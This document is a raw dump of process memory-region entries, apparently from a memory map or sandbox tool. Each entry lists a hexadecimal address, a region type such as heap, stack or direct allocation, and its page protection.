1F17448E000
heap
page read and write
2306455D000
heap
page read and write
7FFDA3546000
unkown
page readonly
7FFD934A3000
unkown
page readonly
2039AB9A000
heap
page read and write
7FFD942A0000
unkown
page readonly
23063A68000
heap
page read and write
23065EB0000
direct allocation
page read and write
23063A7D000
heap
page read and write
7FFD9DF77000
unkown
page readonly
2039AB9A000
heap
page read and write
1F1748CD000
heap
page read and write
2039ABA7000
heap
page read and write
7FF7B734F000
unkown
page write copy
23063DCD000
heap
page read and write
7FF78F8EF000
unkown
page write copy
23063E61000
heap
page read and write
1F17441E000
heap
page read and write
1F1747BE000
heap
page read and write
1F174C26000
heap
page read and write
182B937D000
heap
page read and write
23063DBE000
heap
page read and write
2306506A000
heap
page read and write
230650D0000
heap
page read and write
23063A74000
heap
page read and write
230642D8000
heap
page read and write
23064FE5000
heap
page read and write
1F1747B2000
heap
page read and write
2039AB9A000
heap
page read and write
23065EB0000
direct allocation
page read and write
7FFDA54DE000
unkown
page readonly
7FFD941B4000
unkown
page read and write
2039AB9A000
heap
page read and write
2039AB9A000
heap
page read and write
230639FA000
heap
page read and write
15425F04000
heap
page read and write
7FFDA35E0000
unkown
page readonly
1F174F92000
heap
page read and write
7FFDA4636000
unkown
page readonly
1F174798000
heap
page read and write
7FFDA3585000
unkown
page readonly
2039AB9A000
heap
page read and write
230643CB000
heap
page read and write
1F1747AF000
heap
page read and write
7FF7B7310000
unkown
page readonly
1F174D2F000
heap
page read and write
1F174FAD000
heap
page read and write
21A8A7F8000
heap
page read and write
1F174C58000
heap
page read and write
1F174450000
heap
page read and write
1F174EC1000
heap
page read and write
230643FD000
heap
page read and write
23063A58000
heap
page read and write
23063DC5000
heap
page read and write
23063D73000
heap
page read and write
15425F04000
heap
page read and write
23063D00000
heap
page read and write
7FFD943B2000
unkown
page read and write
1F174E62000
heap
page read and write
23063ECE000
heap
page read and write
2039AB9F000
heap
page read and write
15425F04000
heap
page read and write
202CBB2E000
heap
page read and write
7FFDA3A80000
unkown
page readonly
15425F04000
heap
page read and write
7FFDA2E92000
unkown
page readonly
23063D04000
heap
page read and write
7FFDA4635000
unkown
page readonly
2306200A000
heap
page read and write
2F3FAB30000
heap
page read and write
15425F11000
heap
page read and write
23063D0E000
heap
page read and write
230639FA000
heap
page read and write
2306433D000
heap
page read and write
2039ABA7000
heap
page read and write
7FFDA3C37000
unkown
page read and write
1F174834000
heap
page read and write
7FFDA4170000
unkown
page readonly
1F1747DD000
heap
page read and write
1F174772000
heap
page read and write
2499F239000
heap
page read and write
2A69BFE000
stack
page read and write
1D2C8193000
heap
page read and write
1F17673F000
heap
page read and write
15425F04000
heap
page read and write
B5420FF000
unkown
page read and write
1F174470000
heap
page read and write
1F1744B9000
heap
page read and write
23064565000
heap
page read and write
23066004000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
1F1748CD000
heap
page read and write
23063A22000
heap
page read and write
1F174731000
heap
page read and write
23063D7E000
heap
page read and write
23064500000
heap
page read and write
1F174D2A000
heap
page read and write
2039AB9A000
heap
page read and write
230645B9000
heap
page read and write
23064402000
heap
page read and write
23065FF0000
direct allocation
page read and write
1F174C64000
heap
page read and write
1F1743F2000
heap
page read and write
2306422E000
heap
page read and write
23064FE5000
heap
page read and write
1F174E09000
heap
page read and write
1F17621C000
direct allocation
page read and write
23064472000
heap
page read and write
1F17489D000
heap
page read and write
1F172A33000
heap
page read and write
1F1758B0000
heap
page read and write
1F174E3B000
heap
page read and write
1F174885000
heap
page read and write
23063E63000
heap
page read and write
1F534077000
heap
page read and write
23063CF4000
heap
page read and write
23064298000
heap
page read and write
21BEDDF000
stack
page read and write
23FA0CED000
heap
page read and write
23065ED0000
direct allocation
page read and write
1F176840000
direct allocation
page read and write
1D2C8165000
heap
page read and write
23063A44000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F174747000
heap
page read and write
2306434B000
heap
page read and write
23065EA0000
direct allocation
page read and write
F6CE2FF000
unkown
page read and write
15425F12000
heap
page read and write
23063EAD000
heap
page read and write
7FFDA3AE1000
unkown
page execute read
23063A57000
heap
page read and write
15425F04000
heap
page read and write
7FFDA3564000
unkown
page readonly
7FFDA35D5000
unkown
page readonly
23063EAF000
heap
page read and write
1F175320000
direct allocation
page read and write
2499F4E4000
heap
page read and write
1F174CAF000
heap
page read and write
1F174EE8000
heap
page read and write
1F17501E000
heap
page read and write
2039AB9A000
heap
page read and write
1F175012000
heap
page read and write
1F174C2E000
heap
page read and write
15425F09000
heap
page read and write
1F175AA8000
heap
page read and write
1F174889000
heap
page read and write
1F176840000
direct allocation
page read and write
1F1747EC000
heap
page read and write
9408FF000
stack
page read and write
1F534300000
heap
page read and write
1F17590D000
heap
page read and write
1F17448B000
heap
page read and write
7FFDA434B000
unkown
page readonly
2306432F000
heap
page read and write
7FFD93D87000
unkown
page execute read
2C4666B2000
heap
page read and write
7FFDA57FD000
unkown
page read and write
1F17476B000
heap
page read and write
23063E4C000
heap
page read and write
23063D33000
heap
page read and write
7FFDA3BF4000
unkown
page readonly
23065E80000
direct allocation
page read and write
15425F04000
heap
page read and write
1F17442A000
heap
page read and write
1F174465000
heap
page read and write
23063E86000
heap
page read and write
1F174C2C000
heap
page read and write
15425F04000
heap
page read and write
1F174CF1000
heap
page read and write
23FA0CD5000
heap
page read and write
1F174F98000
heap
page read and write
1F5340AB000
heap
page read and write
1F174EB8000
heap
page read and write
15425E80000
heap
page read and write
1F1743F8000
heap
page read and write
2306427E000
heap
page read and write
1F1748CD000
heap
page read and write
1F1768D0000
direct allocation
page read and write
15425F04000
heap
page read and write
1F174447000
heap
page read and write
1F17491B000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174C6F000
heap
page read and write
2306434C000
heap
page read and write
2039AB9A000
heap
page read and write
1F534023000
heap
page read and write
230645C2000
heap
page read and write
1F174D2A000
heap
page read and write
1F174E71000
heap
page read and write
7FFDA5B86000
unkown
page readonly
1F175A9D000
heap
page read and write
1F175A64000
heap
page read and write
1F174904000
heap
page read and write
15425F13000
heap
page read and write
1F172A14000
heap
page read and write
230644E8000
heap
page read and write
2039ABA1000
heap
page read and write
2499F299000
heap
page read and write
7FFDA32F0000
unkown
page readonly
15425F04000
heap
page read and write
23065EC0000
direct allocation
page read and write
23064445000
heap
page read and write
23063E06000
heap
page read and write
1F174793000
heap
page read and write
DB79AFF000
unkown
page read and write
1F172A2D000
heap
page read and write
23FA0CEE000
heap
page read and write
1F174F2B000
heap
page read and write
230645C8000
heap
page read and write
2039AB9A000
heap
page read and write
23063E14000
heap
page read and write
23063E93000
heap
page read and write
1F17593B000
heap
page read and write
1F174C7D000
heap
page read and write
7FFD93817000
unkown
page write copy
1F1747AE000
heap
page read and write
1F1747FE000
heap
page read and write
7FFDA3C34000
unkown
page read and write
23063E05000
heap
page read and write
1BA29C50000
heap
page read and write
1F1747FE000
heap
page read and write
23063DFD000
heap
page read and write
23063D83000
heap
page read and write
1F17478F000
heap
page read and write
1F1769B8000
direct allocation
page read and write
1F174E6C000
heap
page read and write
1F1748BA000
heap
page read and write
1F176370000
direct allocation
page read and write
23063DCD000
heap
page read and write
23063CF2000
heap
page read and write
2306441B000
heap
page read and write
1F1747D9000
heap
page read and write
1F175979000
heap
page read and write
7FFD937E4000
unkown
page read and write
7FFD9DF43000
unkown
page readonly
2306202D000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F1744D7000
heap
page read and write
1F1744D5000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F175A55000
heap
page read and write
1F174447000
heap
page read and write
2039AB90000
heap
page read and write
230650BF000
heap
page read and write
2F3FAD3A000
heap
page read and write
1F172A2C000
heap
page read and write
23FA0C80000
heap
page read and write
2039AB9A000
heap
page read and write
1F1768A0000
direct allocation
page read and write
24082B0A000
heap
page read and write
1F17477E000
heap
page read and write
1F174E96000
heap
page read and write
23065ED0000
direct allocation
page read and write
23063D8F000
heap
page read and write
1F174C6E000
heap
page read and write
2306445F000
heap
page read and write
2039ABA7000
heap
page read and write
21BF1CE000
stack
page read and write
23065EA0000
direct allocation
page read and write
23064447000
heap
page read and write
54EFFFE000
stack
page read and write
1F17489B000
heap
page read and write
230639B2000
heap
page read and write
230644B9000
heap
page read and write
23063D37000
heap
page read and write
1F175A9D000
heap
page read and write
1F17477E000
heap
page read and write
7FFDA2EA0000
unkown
page readonly
1F174C39000
heap
page read and write
1F53402C000
heap
page read and write
23063E7C000
heap
page read and write
1F174851000
heap
page read and write
7FFD9F3E6000
unkown
page readonly
23062027000
heap
page read and write
7FFDA416D000
unkown
page read and write
29686485000
heap
page read and write
AD0858D000
stack
page read and write
23063D57000
heap
page read and write
2499F282000
heap
page read and write
7FFD94837000
unkown
page write copy
2306505F000
heap
page read and write
1F534010000
heap
page read and write
23063995000
heap
page read and write
1F1743F4000
heap
page read and write
7FFD93B10000
unkown
page readonly
23064341000
heap
page read and write
1F174C3C000
heap
page read and write
23064280000
heap
page read and write
274CF140000
heap
page read and write
1F174891000
heap
page read and write
1F17596D000
heap
page read and write
15425F12000
heap
page read and write
21BEFDE000
stack
page read and write
23063E14000
heap
page read and write
1F174E11000
heap
page read and write
23063E89000
heap
page read and write
1F1729FB000
heap
page read and write
23065045000
heap
page read and write
230642F0000
heap
page read and write
95F41BC000
stack
page read and write
1F17590E000
heap
page read and write
7FFDA3AF1000
unkown
page execute read
F2520FF000
stack
page read and write
23064306000
heap
page read and write
23063A53000
heap
page read and write
7FFD94141000
unkown
page readonly
1F17478F000
heap
page read and write
23065E80000
direct allocation
page read and write
1F1757E1000
heap
page read and write
23064447000
heap
page read and write
7FFD943C0000
unkown
page readonly
15425F04000
heap
page read and write
1F17448A000
heap
page read and write
23063ECD000
heap
page read and write
7FF78F8B1000
unkown
page execute read
15425F13000
heap
page read and write
7FFDA5494000
unkown
page readonly
22B3B110000
heap
page read and write
7FF7B734F000
unkown
page read and write
2039ABA7000
heap
page read and write
23063EB8000
heap
page read and write
23063A4C000
heap
page read and write
1F1748CA000
heap
page read and write
7FFDA4DA5000
unkown
page read and write
E47F93C000
stack
page read and write
1F1744DB000
heap
page read and write
23063A5F000
heap
page read and write
1F17479F000
heap
page read and write
1F174E08000
heap
page read and write
15425F04000
heap
page read and write
7FFDA5460000
unkown
page readonly
A8D6FC000
stack
page read and write
15425F04000
heap
page read and write
23064279000
heap
page read and write
1F1759E0000
heap
page read and write
1F1748F9000
heap
page read and write
1F176840000
direct allocation
page read and write
23062029000
heap
page read and write
23063A5F000
heap
page read and write
22924A00000
heap
page read and write
1F1748AD000
heap
page read and write
15425F11000
heap
page read and write
1FE243F4000
heap
page read and write
23063CEC000
heap
page read and write
7FFDA3A91000
unkown
page execute read
23065026000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA35F5000
unkown
page read and write
23064228000
heap
page read and write
7FFD9DF74000
unkown
page readonly
1F1757D0000
heap
page read and write
230644AC000
heap
page read and write
2499F2B3000
heap
page read and write
7FFDA3C11000
unkown
page execute read
182B937D000
heap
page read and write
2039AB9A000
heap
page read and write
1F17477F000
heap
page read and write
230643D3000
heap
page read and write
2039ABA8000
heap
page read and write
15425F12000
heap
page read and write
7FFD9F3E1000
unkown
page execute read
1F1758A6000
heap
page read and write
23064350000
heap
page read and write
1F174DCC000
heap
page read and write
230645C9000
heap
page read and write
230642B3000
heap
page read and write
1F17298E000
heap
page read and write
1DEFE7A1000
heap
page read and write
1FE244A1000
heap
page read and write
AC19FF000
stack
page read and write
1DEFE8D0000
heap
page read and write
2306442C000
heap
page read and write
1F17661F000
heap
page read and write
230645C9000
heap
page read and write
15425F12000
heap
page read and write
230642F0000
heap
page read and write
1F176840000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
1F174CD9000
heap
page read and write
7FFD9DFA5000
unkown
page readonly
7FFD94873000
unkown
page write copy
1F17476F000
heap
page read and write
1F174C6B000
heap
page read and write
2499F2CC000
heap
page read and write
1F1747E2000
heap
page read and write
1F1747D0000
heap
page read and write
1F174E07000
heap
page read and write
1A39914C000
heap
page read and write
23FA0CFA000
heap
page read and write
1F174913000
heap
page read and write
15425F11000
heap
page read and write
23063EAF000
heap
page read and write
2306200B000
heap
page read and write
1F176611000
heap
page read and write
182B93CB000
heap
page read and write
1F1743ED000
heap
page read and write
23061FCC000
heap
page read and write
230659B0000
direct allocation
page read and write
23063E97000
heap
page read and write
2F3FAD45000
heap
page read and write
230641F1000
heap
page read and write
15425F12000
heap
page read and write
23063A05000
heap
page read and write
15425F12000
heap
page read and write
23063A57000
heap
page read and write
23064350000
heap
page read and write
1F174FBF000
heap
page read and write
1D2C81B7000
heap
page read and write
15425F04000
heap
page read and write
1F175812000
heap
page read and write
23064309000
heap
page read and write
15425F04000
heap
page read and write
1FE24390000
heap
page read and write
2306455D000
heap
page read and write
65477E4000
stack
page read and write
23063DD1000
heap
page read and write
1F17477E000
heap
page read and write
1F1748BA000
heap
page read and write
7FFD939A0000
unkown
page readonly
7FFDA3301000
unkown
page execute read
15425F13000
heap
page read and write
23063E89000
heap
page read and write
1F1748C8000
heap
page read and write
57CECFF000
stack
page read and write
23063DD0000
heap
page read and write
23064F50000
heap
page read and write
1F175A09000
heap
page read and write
230641F3000
heap
page read and write
23063E09000
heap
page read and write
1F1747E5000
heap
page read and write
15425F04000
heap
page read and write
23063980000
heap
page read and write
1F1744CA000
heap
page read and write
1F1748CD000
heap
page read and write
1F1758D0000
heap
page read and write
23064431000
heap
page read and write
7FFDA3306000
unkown
page read and write
2499F299000
heap
page read and write
1F17489C000
heap
page read and write
2306433D000
heap
page read and write
15425F04000
heap
page read and write
23063A1D000
heap
page read and write
1F175A13000
heap
page read and write
23064561000
heap
page read and write
23063D3D000
heap
page read and write
1F174E70000
heap
page read and write
1F174831000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD9DF31000
unkown
page execute read
1F1744D2000
heap
page read and write
23063A0E000
heap
page read and write
7FFDA3712000
unkown
page execute read
1F174F22000
heap
page read and write
7FFDA360D000
unkown
page readonly
7FFDA0873000
unkown
page readonly
23065EB0000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
15425F04000
heap
page read and write
2306430A000
heap
page read and write
1F176880000
direct allocation
page read and write
23064F9E000
heap
page read and write
7FFD93CB4000
unkown
page readonly
23063CFE000
heap
page read and write
1F175846000
heap
page read and write
7FFD9DF70000
unkown
page readonly
7FFD93BC7000
unkown
page readonly
23064F34000
heap
page read and write
1A399198000
heap
page read and write
23063EC0000
heap
page read and write
1F174484000
heap
page read and write
7FFD94872000
unkown
page read and write
1F174EE2000
heap
page read and write
15425F12000
heap
page read and write
7FFD93CE7000
unkown
page readonly
1F1760D0000
direct allocation
page read and write
23063E12000
heap
page read and write
1F174779000
heap
page read and write
22B3B1E2000
heap
page read and write
15425EFE000
heap
page read and write
23063EA5000
heap
page read and write
1D2C80E0000
remote allocation
page read and write
1F1747E8000
heap
page read and write
1F1747AE000
heap
page read and write
7FFDA3541000
unkown
page execute read
2306427F000
heap
page read and write
12FF7F30000
heap
page read and write
7FFD93C31000
unkown
page execute read
23063E5C000
heap
page read and write
1F17586C000
heap
page read and write
1F174891000
heap
page read and write
1D2C8424000
heap
page read and write
15425F04000
heap
page read and write
15425F04000
heap
page read and write
2039ABA8000
heap
page read and write
23064425000
heap
page read and write
23061FF9000
heap
page read and write
249E50D0000
heap
page read and write
7FFD9DF35000
unkown
page read and write
2306504A000
heap
page read and write
1F174C86000
heap
page read and write
1F1747F1000
heap
page read and write
23065EA0000
direct allocation
page read and write
182B9580000
remote allocation
page read and write
2039AB9A000
heap
page read and write
1F1747EE000
heap
page read and write
23063E85000
heap
page read and write
23065998000
direct allocation
page read and write
1695B351000
heap
page read and write
1F1748AC000
heap
page read and write
15425F11000
heap
page read and write
1F176501000
heap
page read and write
7FFDA5490000
unkown
page readonly
23061FD3000
heap
page read and write
23FA0CED000
heap
page read and write
1F1759FA000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD9F3D4000
unkown
page read and write
7FFDA3EB2000
unkown
page readonly
1F17447B000
heap
page read and write
19F578E8000
heap
page read and write
2B7C0180000
heap
page read and write
23063CF9000
heap
page read and write
2039AB9A000
heap
page read and write
2039AB9A000
heap
page read and write
23065EF0000
direct allocation
page read and write
230645EE000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA35AB000
unkown
page read and write
23064445000
heap
page read and write
15425F04000
heap
page read and write
274CF400000
heap
page read and write
1695B361000
heap
page read and write
1F533FF0000
heap
page read and write
23064552000
heap
page read and write
1F1757FC000
heap
page read and write
230642A5000
heap
page read and write
2039AB9A000
heap
page read and write
1F174E84000
heap
page read and write
1D2C80E0000
remote allocation
page read and write
7FFDA35EB000
unkown
page read and write
1F174DEC000
heap
page read and write
2039ABA7000
heap
page read and write
23063D96000
heap
page read and write
1F174FA6000
heap
page read and write
7FFDA5B8A000
unkown
page read and write
2039AB9A000
heap
page read and write
1FE2443F000
heap
page read and write
1F1761D0000
direct allocation
page read and write
2039AB9A000
heap
page read and write
1F176501000
heap
page read and write
7FFD94457000
unkown
page execute read
182B93E5000
heap
page read and write
1F175859000
heap
page read and write
1F174812000
heap
page read and write
15425F11000
heap
page read and write
1F174450000
heap
page read and write
23063EAD000
heap
page read and write
7FFDA5B86000
unkown
page readonly
2F3FAD3F000
heap
page read and write
1F174CE0000
heap
page read and write
22924800000
heap
page read and write
15425F07000
heap
page read and write
1F174488000
heap
page read and write
26B48240000
heap
page read and write
1F1747BE000
heap
page read and write
7FFD94801000
unkown
page read and write
23063E72000
heap
page read and write
7FF7B734F000
unkown
page write copy
1F174851000
heap
page read and write
23064F9E000
heap
page read and write
23063A1F000
heap
page read and write
1FE243F0000
heap
page read and write
23062005000
heap
page read and write
23063DA7000
heap
page read and write
23063DD0000
heap
page read and write
1FE243D0000
remote allocation
page read and write
23063E64000
heap
page read and write
7FFD93D12000
unkown
page execute read
D5F27DE000
stack
page read and write
248D01F0000
heap
page read and write
1F1744CA000
heap
page read and write
2039ABA7000
heap
page read and write
23064294000
heap
page read and write
23063880000
direct allocation
page read and write
1F174E57000
heap
page read and write
23065800000
direct allocation
page read and write
1F17490F000
heap
page read and write
1F174C8E000
heap
page read and write
15425F03000
heap
page read and write
1F1748AE000
heap
page read and write
23064317000
heap
page read and write
15425F04000
heap
page read and write
7FFDA3BF7000
unkown
page readonly
230645AE000
heap
page read and write
1F176870000
direct allocation
page read and write
2F3FAD3F000
heap
page read and write
23064472000
heap
page read and write
230656C0000
direct allocation
page read and write
1F534019000
heap
page read and write
7FFDA5495000
unkown
page read and write
23065A04000
direct allocation
page read and write
230645D4000
heap
page read and write
2039ABA7000
heap
page read and write
7FFDA35F1000
unkown
page execute read
23063E9B000
heap
page read and write
1F174CA8000
heap
page read and write
1F1747FE000
heap
page read and write
7FFD93519000
unkown
page readonly
1F174425000
heap
page read and write
23065EA0000
direct allocation
page read and write
23065010000
heap
page read and write
23063D4B000
heap
page read and write
15425EF0000
heap
page read and write
1F174E7F000
heap
page read and write
1F174885000
heap
page read and write
23063A68000
heap
page read and write
1F17478F000
heap
page read and write
1F174F9B000
heap
page read and write
1F1744B8000
heap
page read and write
1D2C8178000
heap
page read and write
2306426B000
heap
page read and write
2306427F000
heap
page read and write
1F176840000
direct allocation
page read and write
2306426B000
heap
page read and write
182B9560000
heap
page read and write
7FF78F8F1000
unkown
page read and write
1F174CEE000
heap
page read and write
7FFDA416F000
unkown
page readonly
86C5BFF000
unkown
page read and write
23063A5A000
heap
page read and write
7FFDA5B80000
unkown
page readonly
7FFDA3C28000
unkown
page readonly
1F174DCC000
heap
page read and write
2039ABA8000
heap
page read and write
23063E6A000
heap
page read and write
1F176840000
direct allocation
page read and write
230645B9000
heap
page read and write
23063D3E000
heap
page read and write
1F174D29000
heap
page read and write
1F17586C000
heap
page read and write
1F175812000
heap
page read and write
AD089FE000
stack
page read and write
1F172A58000
heap
page read and write
230639B5000
heap
page read and write
1F174920000
direct allocation
page read and write
1F174C8A000
heap
page read and write
2A69AFE000
unkown
page read and write
230639EB000
heap
page read and write
1F174EBA000
heap
page read and write
1F172A5E000
heap
page read and write
15425F04000
heap
page read and write
1F1759D5000
heap
page read and write
23063DB8000
heap
page read and write
2306459B000
heap
page read and write
23063CF3000
heap
page read and write
7FFD94801000
unkown
page readonly
7FFDA35C3000
unkown
page read and write
15ED9584000
heap
page read and write
7FFDA4174000
unkown
page read and write
1F175965000
heap
page read and write
26B48280000
heap
page read and write
230650AD000
heap
page read and write
23064F6F000
heap
page read and write
1A39914F000
heap
page read and write
7FFDA5461000
unkown
page execute read
23061FD2000
heap
page read and write
1F1747D0000
heap
page read and write
23065EC0000
direct allocation
page read and write
2039AB9A000
heap
page read and write
2039ABA8000
heap
page read and write
248D0398000
heap
page read and write
1F1762E0000
direct allocation
page read and write
1F176840000
direct allocation
page read and write
7FFD941B8000
unkown
page readonly
7FFDA3BF5000
unkown
page read and write
1F175A4F000
heap
page read and write
230638FC000
direct allocation
page read and write
2306455D000
heap
page read and write
1F174795000
heap
page read and write
15425F09000
heap
page read and write
1FE24420000
heap
page read and write
7FFDA3AF0000
unkown
page readonly
57CEDFF000
stack
page read and write
1F17444E000
heap
page read and write
23063DB0000
heap
page read and write
23063EC0000
heap
page read and write
2306202E000
heap
page read and write
2039AB9A000
heap
page read and write
2039ABA6000
heap
page read and write
1F1747C0000
heap
page read and write
1F17479E000
heap
page read and write
781F76C000
stack
page read and write
1F175AAA000
heap
page read and write
2499F24D000
heap
page read and write
23063E3C000
heap
page read and write
2039ABA8000
heap
page read and write
230644C7000
heap
page read and write
1F174C4E000
heap
page read and write
1F1747D0000
heap
page read and write
23064F34000
heap
page read and write
2039AB9A000
heap
page read and write
4E51DEC000
stack
page read and write
1F175A4E000
heap
page read and write
1F1747F2000
heap
page read and write
15425F12000
heap
page read and write
23063DB5000
heap
page read and write
23063E0F000
heap
page read and write
229248E0000
heap
page read and write
1F174D47000
heap
page read and write
7FFDA2EA1000
unkown
page execute read
7FFDA4631000
unkown
page execute read
15425EFA000
heap
page read and write
15425F12000
heap
page read and write
7FFDA4DA1000
unkown
page execute read
1F17488B000
heap
page read and write
7FFD9446C000
unkown
page execute read
2306448C000
heap
page read and write
7FFDA3A81000
unkown
page execute read
23065E80000
direct allocation
page read and write
249E5100000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174F92000
heap
page read and write
2039ABA8000
heap
page read and write
2499F272000
heap
page read and write
23064F7E000
heap
page read and write
7FF7B733C000
unkown
page readonly
15425F09000
heap
page read and write
1F174C25000
heap
page read and write
12FF7FA0000
heap
page read and write
15425F12000
heap
page read and write
7FFD93CB2000
unkown
page execute read
23063DC7000
heap
page read and write
23063CD1000
heap
page read and write
19F578E0000
heap
page read and write
1F17440F000
heap
page read and write
1A399172000
heap
page read and write
1F5341E0000
remote allocation
page read and write
1F1748AF000
heap
page read and write
1F174E4C000
heap
page read and write
23065EA0000
direct allocation
page read and write
230642D0000
heap
page read and write
2274B260000
heap
page read and write
2F3FAD2B000
heap
page read and write
23063E90000
heap
page read and write
230643B5000
heap
page read and write
1F174756000
heap
page read and write
1F1747E8000
heap
page read and write
23065103000
heap
page read and write
1F174E1A000
heap
page read and write
2039AB9A000
heap
page read and write
2306459A000
heap
page read and write
23064536000
heap
page read and write
1F174D47000
heap
page read and write
15425F04000
heap
page read and write
1F174F22000
heap
page read and write
230642EB000
heap
page read and write
23063EC0000
heap
page read and write
2039AB9B000
heap
page read and write
1F174C3A000
heap
page read and write
23063A24000
heap
page read and write
1F1744D2000
heap
page read and write
15425F04000
heap
page read and write
2499F180000
remote allocation
page read and write
15425F11000
heap
page read and write
23063CF5000
heap
page read and write
1F17474C000
heap
page read and write
23064820000
direct allocation
page read and write
23063A5A000
heap
page read and write
23063A5A000
heap
page read and write
E47FDFF000
stack
page read and write
23064441000
heap
page read and write
229249E8000
heap
page read and write
23064F86000
heap
page read and write
7FFDA374F000
unkown
page readonly
1A399280000
heap
page read and write
4EDCAFE000
unkown
page read and write
15425F12000
heap
page read and write
230643B5000
heap
page read and write
23063E0F000
heap
page read and write
1F174492000
heap
page read and write
26B482FD000
heap
page read and write
15425F04000
heap
page read and write
8BB31FF000
stack
page read and write
23064425000
heap
page read and write
23063850000
unkown
page readonly
2039AB9A000
heap
page read and write
1F174CAF000
heap
page read and write
1F1744CE000
heap
page read and write
1F176840000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
1F172920000
heap
page read and write
A8D8FF000
stack
page read and write
230639B4000
heap
page read and write
23063DFB000
heap
page read and write
23063E64000
heap
page read and write
7FFD9DF50000
unkown
page readonly
26B48270000
heap
page read and write
1F17500C000
heap
page read and write
1F174C21000
heap
page read and write
1F17474A000
heap
page read and write
1F17446E000
heap
page read and write
23063E04000
heap
page read and write
230644B4000
heap
page read and write
23063DCE000
heap
page read and write
1F174EEA000
heap
page read and write
23063E04000
heap
page read and write
1F174CE0000
heap
page read and write
2306451C000
heap
page read and write
23063A59000
heap
page read and write
7FFD94200000
unkown
page readonly
2039AB9A000
heap
page read and write
23063A53000
heap
page read and write
23064441000
heap
page read and write
23065EA0000
direct allocation
page read and write
15425F04000
heap
page read and write
15425F04000
heap
page read and write
230650B0000
heap
page read and write
1F17584B000
heap
page read and write
23064561000
heap
page read and write
7FFDA3BF1000
unkown
page execute read
7FFDA0875000
unkown
page readonly
7FF78F8F3000
unkown
page readonly
1F175007000
heap
page read and write
1F175812000
heap
page read and write
1F175909000
heap
page read and write
2920B6E4000
heap
page read and write
2306398B000
heap
page read and write
1F176850000
direct allocation
page read and write
1F534038000
heap
page read and write
29686480000
heap
page read and write
7FFDA3600000
unkown
page readonly
21A8A7B0000
heap
page read and write
7FFD9F3D5000
unkown
page readonly
1F176840000
direct allocation
page read and write
1F172A4D000
heap
page read and write
1F17490E000
heap
page read and write
2039ABA8000
heap
page read and write
1F174C4A000
heap
page read and write
1F172A36000
heap
page read and write
1C7C8FE000
stack
page read and write
23063E80000
heap
page read and write
2306448C000
heap
page read and write
1F174C4E000
heap
page read and write
7FF78F8F1000
unkown
page read and write
1F176840000
direct allocation
page read and write
1F174E34000
heap
page read and write
4E520FE000
stack
page read and write
23063A5E000
heap
page read and write
1F174C29000
heap
page read and write
7FFDA57FF000
unkown
page readonly
23065EC0000
direct allocation
page read and write
23064F49000
heap
page read and write
1F172A3B000
heap
page read and write
A8D7FF000
unkown
page read and write
274CF12B000
heap
page read and write
23064317000
heap
page read and write
1F174F1F000
heap
page read and write
230642C7000
heap
page read and write
1F1748F8000
heap
page read and write
2B7C0310000
heap
page read and write
15425F04000
heap
page read and write
23063A68000
heap
page read and write
1A3990C0000
heap
page read and write
1F1758F0000
heap
page read and write
1F5340AB000
heap
page read and write
23063A13000
heap
page read and write
1F1758C3000
heap
page read and write
7FFD9DF76000
unkown
page read and write
1695B330000
heap
page read and write
23064472000
heap
page read and write
230650B5000
heap
page read and write
C9C2FFF000
unkown
page read and write
7FFDA3AFB000
unkown
page readonly
21BEDE4000
stack
page read and write
D5F2BBF000
stack
page read and write
7FFDA4331000
unkown
page execute read
1F1756D0000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
23063999000
heap
page read and write
23063E04000
heap
page read and write
1F1759E7000
heap
page read and write
1F1747BF000
heap
page read and write
1F175A55000
heap
page read and write
23063D0F000
heap
page read and write
7FFD9425C000
unkown
page readonly
1F174E57000
heap
page read and write
23063D8F000
heap
page read and write
1F174EC2000
heap
page read and write
F9F95FF000
stack
page read and write
1F534060000
heap
page read and write
23063E04000
heap
page read and write
1F174E16000
heap
page read and write
23065023000
heap
page read and write
1F172A47000
heap
page read and write
2306442A000
heap
page read and write
1F1769BC000
direct allocation
page read and write
23064467000
heap
page read and write
23064F59000
heap
page read and write
7FFD94352000
unkown
page readonly
2306433F000
heap
page read and write
23063E08000
heap
page read and write
1F174456000
heap
page read and write
1F174D1A000
heap
page read and write
2274AE80000
heap
page read and write
1F1759FA000
heap
page read and write
248D05C0000
heap
page read and write
1F174ECB000
heap
page read and write
23063D96000
heap
page read and write
C9C2EFC000
stack
page read and write
7FFD941B1000
unkown
page write copy
2306448C000
heap
page read and write
23063D8F000
heap
page read and write
1F1748AE000
heap
page read and write
2499F289000
heap
page read and write
274CF150000
heap
page read and write
1F174835000
heap
page read and write
92D098E000
stack
page read and write
1F176388000
direct allocation
page read and write
230643E7000
heap
page read and write
23063A34000
heap
page read and write
2306398D000
heap
page read and write
7FFD948A3000
unkown
page read and write
1F174C38000
heap
page read and write
1F17489D000
heap
page read and write
2039AB9A000
heap
page read and write
15425E70000
heap
page readonly
7FFDA54B1000
unkown
page execute read
1F174E6C000
heap
page read and write
1F174F22000
heap
page read and write
1F17474F000
heap
page read and write
230645CA000
heap
page read and write
23064278000
heap
page read and write
23063E0A000
heap
page read and write
7FFDA0861000
unkown
page execute read
15425F04000
heap
page read and write
23063E53000
heap
page read and write
23064F35000
heap
page read and write
1F176840000
direct allocation
page read and write
2039AB79000
heap
page read and write
230644BC000
heap
page read and write
1F17661C000
heap
page read and write
1F174DF5000
heap
page read and write
23063D34000
heap
page read and write
1F174490000
heap
page read and write
23064F69000
heap
page read and write
23063ECD000
heap
page read and write
1F172A37000
heap
page read and write
23063E8B000
heap
page read and write
2039AB9A000
heap
page read and write
7FFDA3A93000
unkown
page readonly
1F1747BF000
heap
page read and write
1F1758AC000
heap
page read and write
1F174C92000
heap
page read and write
23064FCE000
heap
page read and write
1F1744C9000
heap
page read and write
7FFD9F7F6000
unkown
page readonly
23FA0CB7000
heap
page read and write
2039AB9A000
heap
page read and write
1F1747A4000
heap
page read and write
1F53402D000
heap
page read and write
19F57910000
heap
page read and write
1F174D13000
heap
page read and write
1F174914000
heap
page read and write
24082DA0000
heap
page read and write
